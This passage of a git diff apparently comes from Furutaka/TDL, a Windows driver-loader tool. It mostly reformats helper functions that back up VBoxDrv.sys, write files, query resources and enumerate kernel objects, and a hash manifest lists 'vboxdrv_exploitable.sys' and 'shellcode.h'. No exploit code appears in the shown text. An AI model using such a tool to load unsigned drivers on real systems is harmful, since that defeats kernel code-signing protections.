IMAGE_RESOURCE_DATA_ENTRY *DataEntry; - PBYTE Data = NULL; - ULONG SizeOfData = 0; + NTSTATUS status; + ULONG_PTR IdPath[3]; + IMAGE_RESOURCE_DATA_ENTRY *DataEntry; + PBYTE Data = NULL; + ULONG SizeOfData = 0; - if (DllHandle != NULL) { + if (DllHandle != NULL) { - IdPath[0] = (ULONG_PTR)RT_RCDATA; //type - IdPath[1] = ResourceId; //id - IdPath[2] = 0; //lang + IdPath[0] = (ULONG_PTR)RT_RCDATA; //type + IdPath[1] = ResourceId; //id + IdPath[2] = 0; //lang - status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); - if (NT_SUCCESS(status)) { - status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); - if (NT_SUCCESS(status)) { - if (DataSize) { - *DataSize = SizeOfData; - } - } - } - } - return Data; + status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); + if (NT_SUCCESS(status)) { + status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); + if (NT_SUCCESS(status)) { + if (DataSize) { + *DataSize = SizeOfData; + } + } + } + } + return Data; } /* @@ -136,39 +136,39 @@ PBYTE supQueryResourceData( * */ BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ) + _In_ BOOL bRestore +) { - BOOL bResult = FALSE; - WCHAR szOldDriverName[MAX_PATH * 2]; - WCHAR szNewDriverName[MAX_PATH * 2]; - WCHAR szDriverDirName[MAX_PATH * 2]; + BOOL bResult = FALSE; + WCHAR szOldDriverName[MAX_PATH * 2]; + WCHAR szNewDriverName[MAX_PATH * 2]; + WCHAR szDriverDirName[MAX_PATH * 2]; - if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { - return FALSE; - } + if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { + return FALSE; + } - _strcat(szDriverDirName, TEXT("\\drivers\\")); + _strcat(szDriverDirName, TEXT("\\drivers\\")); - if (bRestore) { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); - if (PathFileExists(szOldDriverName)) { - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - } - else { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - return bResult; + if (bRestore) { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); + if (PathFileExists(szOldDriverName)) { + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + } + else { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + return bResult; } /* @@ -180,93 +180,93 @@ BOOL supBackupVBoxDrv( * */ SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ) + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +) { - NTSTATUS Status; - DWORD dwFlag; - HANDLE hFile = NULL; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING NtFileName; - IO_STATUS_BLOCK IoStatus; - LARGE_INTEGER Position; - ACCESS_MASK DesiredAccess; - PLARGE_INTEGER pPosition = NULL; - ULONG_PTR nBlocks, BlockIndex; - ULONG BlockSize, RemainingSize; - PBYTE ptr = (PBYTE)Buffer; - SIZE_T BytesWritten = 0; + NTSTATUS Status; + DWORD dwFlag; + HANDLE hFile = NULL; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING NtFileName; + IO_STATUS_BLOCK IoStatus; + LARGE_INTEGER Position; + ACCESS_MASK DesiredAccess; + PLARGE_INTEGER pPosition = NULL; + ULONG_PTR nBlocks, BlockIndex; + ULONG BlockSize, RemainingSize; + PBYTE ptr = (PBYTE)Buffer; + SIZE_T BytesWritten = 0; - if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) - return 0; + if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) + return 0; - DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; - dwFlag = FILE_OVERWRITE_IF; + DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE; + dwFlag = FILE_OVERWRITE_IF; - if (Append == TRUE) { - DesiredAccess |= FILE_READ_ACCESS; - dwFlag = FILE_OPEN_IF; - } + if (Append != FALSE) { + DesiredAccess |= FILE_READ_ACCESS; + dwFlag = FILE_OPEN_IF; + } - InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); + InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL); - __try { - Status = NtCreateFile(&hFile, DesiredAccess, &attr, - &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, - FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); + __try { + Status = NtCreateFile(&hFile, DesiredAccess, &attr, + &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag, + FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0); - if (!NT_SUCCESS(Status)) - __leave; + if (!NT_SUCCESS(Status)) + __leave; - pPosition = NULL; + pPosition = NULL; - if (Append == TRUE) { - Position.LowPart = FILE_WRITE_TO_END_OF_FILE; - Position.HighPart = -1; - pPosition = &Position; - } + if (Append != FALSE) { + Position.LowPart = FILE_WRITE_TO_END_OF_FILE; + Position.HighPart = -1; + pPosition = &Position; + } - if (Size < 0x80000000) { - BlockSize = (ULONG)Size; - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + if (Size < 0x80000000) { + BlockSize = (ULONG)Size; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - BytesWritten += IoStatus.Information; - } - else { - BlockSize = 0x7FFFFFFF; - nBlocks = (Size / BlockSize); - for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { + BytesWritten += IoStatus.Information; + } + else { + BlockSize = 0x7FFFFFFF; + nBlocks = (Size / BlockSize); + for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; - ptr += BlockSize; - BytesWritten += IoStatus.Information; - } - RemainingSize = Size % BlockSize; - if (RemainingSize != 0) { - Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); - if (!NT_SUCCESS(Status)) - __leave; - BytesWritten += IoStatus.Information; - } - } - } - __finally { - if (hFile != NULL) { - if (Flush == TRUE) NtFlushBuffersFile(hFile, &IoStatus); - NtClose(hFile); - } - RtlFreeUnicodeString(&NtFileName); - } - return BytesWritten; + ptr += BlockSize; + BytesWritten += IoStatus.Information; + } + RemainingSize = (ULONG)(Size % BlockSize); + if (RemainingSize != 0) { + Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL); + if (!NT_SUCCESS(Status)) + __leave; + BytesWritten += IoStatus.Information; + } + } + } + __finally { + if (hFile != NULL) { + if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus); + NtClose(hFile); + } + RtlFreeUnicodeString(&NtFileName); + } + return BytesWritten; } /* @@ -278,30 +278,30 @@ SIZE_T supWriteBufferToFile( * */ NTSTATUS NTAPI supDetectObjectCallback( - _In_ POBJECT_DIRECTORY_INFORMATION Entry, - _In_ PVOID CallbackParam - ) + _In_ POBJECT_DIRECTORY_INFORMATION Entry, + _In_ PVOID CallbackParam +) { - POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; + POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; - if (Entry == NULL) { - return STATUS_INVALID_PARAMETER_1; - } + if (Entry == NULL) { + return STATUS_INVALID_PARAMETER_1; + } - if (CallbackParam == NULL) { - return STATUS_INVALID_PARAMETER_2; - } + if (CallbackParam == NULL) { + return STATUS_INVALID_PARAMETER_2; + } - if (Param->Buffer == NULL || Param->BufferSize == 0) { - return STATUS_MEMORY_NOT_ALLOCATED; - } + if (Param->Buffer == NULL || Param->BufferSize == 0) { + return STATUS_MEMORY_NOT_ALLOCATED; + } - if (Entry->Name.Buffer) { - if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { - return STATUS_SUCCESS; - } - } - return STATUS_UNSUCCESSFUL; + if (Entry->Name.Buffer) { + if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { + return STATUS_SUCCESS; + } + } + return STATUS_UNSUCCESSFUL; } /* @@ -313,87 +313,87 @@ NTSTATUS NTAPI supDetectObjectCallback( * */ NTSTATUS NTAPI supEnumSystemObjects( - _In_opt_ LPWSTR pwszRootDirectory, - _In_opt_ HANDLE hRootDirectory, - _In_ PENUMOBJECTSCALLBACK CallbackProc, - _In_opt_ PVOID CallbackParam - ) + _In_opt_ LPWSTR pwszRootDirectory, + _In_opt_ HANDLE hRootDirectory, + _In_ PENUMOBJECTSCALLBACK CallbackProc, + _In_opt_ PVOID CallbackParam +) { - BOOL cond = TRUE; - ULONG ctx, rlen; - HANDLE hDirectory = NULL; - NTSTATUS status; - NTSTATUS CallbackStatus; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING sname; + BOOL cond = TRUE; + ULONG ctx, rlen; + HANDLE hDirectory = NULL; + NTSTATUS status; + NTSTATUS CallbackStatus; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING sname; - POBJECT_DIRECTORY_INFORMATION objinf; + POBJECT_DIRECTORY_INFORMATION objinf; - if (CallbackProc == NULL) { - return STATUS_INVALID_PARAMETER_4; - } + if (CallbackProc == NULL) { + return STATUS_INVALID_PARAMETER_4; + } - status = STATUS_UNSUCCESSFUL; + status = STATUS_UNSUCCESSFUL; - __try { + __try { - // We can use root directory. - if (pwszRootDirectory != NULL) { - RtlSecureZeroMemory(&sname, sizeof(sname)); - RtlInitUnicodeString(&sname, pwszRootDirectory); - InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); - status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); - if (!NT_SUCCESS(status)) { - return status; - } - } - else { - if (hRootDirectory == NULL) { - return STATUS_INVALID_PARAMETER_2; - } - hDirectory = hRootDirectory; - } + // We can use root directory. + if (pwszRootDirectory != NULL) { + RtlSecureZeroMemory(&sname, sizeof(sname)); + RtlInitUnicodeString(&sname, pwszRootDirectory); + InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); + status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); + if (!NT_SUCCESS(status)) { + return status; + } + } + else { + if (hRootDirectory == NULL) { + return STATUS_INVALID_PARAMETER_2; + } + hDirectory = hRootDirectory; + } - // Enumerate objects in directory. - ctx = 0; - do { + // Enumerate objects in directory. + ctx = 0; + do { - rlen = 0; - status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); - if (status != STATUS_BUFFER_TOO_SMALL) - break; + rlen = 0; + status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); + if (status != STATUS_BUFFER_TOO_SMALL) + break; - objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); - if (objinf == NULL) - break; + objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); + if (objinf == NULL) + break; - status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); - if (!NT_SUCCESS(status)) { - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - break; - } + status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); + if (!NT_SUCCESS(status)) { + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + break; + } - CallbackStatus = CallbackProc(objinf, CallbackParam); + CallbackStatus = CallbackProc(objinf, CallbackParam); - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); - if (NT_SUCCESS(CallbackStatus)) { - status = STATUS_SUCCESS; - break; - } + if (NT_SUCCESS(CallbackStatus)) { + status = STATUS_SUCCESS; + break; + } - } while (cond); + } while (cond); - if (hDirectory != NULL) { - NtClose(hDirectory); - } + if (hDirectory != NULL) { + NtClose(hDirectory); + } - } - __except (EXCEPTION_EXECUTE_HANDLER) { - status = STATUS_ACCESS_VIOLATION; - } + } + __except (EXCEPTION_EXECUTE_HANDLER) { + status = STATUS_ACCESS_VIOLATION; + } - return status; + return status; } /* @@ -405,18 +405,18 @@ NTSTATUS NTAPI supEnumSystemObjects( * */ BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ) + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +) { - OBJSCANPARAM Param; + OBJSCANPARAM Param; - if (ObjectName == NULL) { - return FALSE; - } + if (ObjectName == NULL) { + return FALSE; + } - Param.Buffer = ObjectName; - Param.BufferSize = (ULONG)_strlen(ObjectName); + Param.Buffer = ObjectName; + Param.BufferSize = (ULONG)_strlen(ObjectName); - return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); + return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); } diff --git a/Source/Furutaka/sup.h b/Source/Furutaka/sup.h index e1cd4fa..10bab5d 100644 --- a/Source/Furutaka/sup.h +++ b/Source/Furutaka/sup.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * Common header file for the program support routines. * @@ -21,39 +21,39 @@ typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); typedef struct _OBJSCANPARAM { - PWSTR Buffer; - ULONG BufferSize; + PWSTR Buffer; + ULONG BufferSize; } OBJSCANPARAM, *POBJSCANPARAM; ULONG_PTR supGetNtOsBase( - VOID - ); + VOID +); PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ); + _In_ SYSTEM_INFORMATION_CLASS InfoClass +); PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ); + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +); BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ); + _In_ BOOL bRestore +); SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ); + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +); BOOL supIsObjectExists( - _In_ LPWSTR RootDirectory, - _In_ LPWSTR ObjectName - ); + _In_ LPWSTR RootDirectory, + _In_ LPWSTR ObjectName +); #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) diff --git a/TDL.sha256 b/TDL.sha256 index 2d5ae90..8a8ffcf 100644 --- a/TDL.sha256 +++ b/TDL.sha256 @@ -1,29 +1,36 @@ c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys 4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys -48820631b430a40f296b17280bc18736f8ac428514ffd931b4b529dc5cc04136 *Compiled\Furutaka.exe +9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln 01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln +c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln 2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c -c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln -746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c -3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h -cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys -01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln -c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj +e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c +6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h +24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln +16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters -2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user -1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h -c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c -964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h -8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c +b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user +1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h +94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c +33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h +c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c +8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h +fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h +2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f *Source\Furutaka\resource.rc +f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h +fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c +059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h +12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h +cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h @@ -38,10 +45,3 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutak 27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c 60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c 87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c -8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h -fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h -8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc -a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h -2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c -d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h -12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h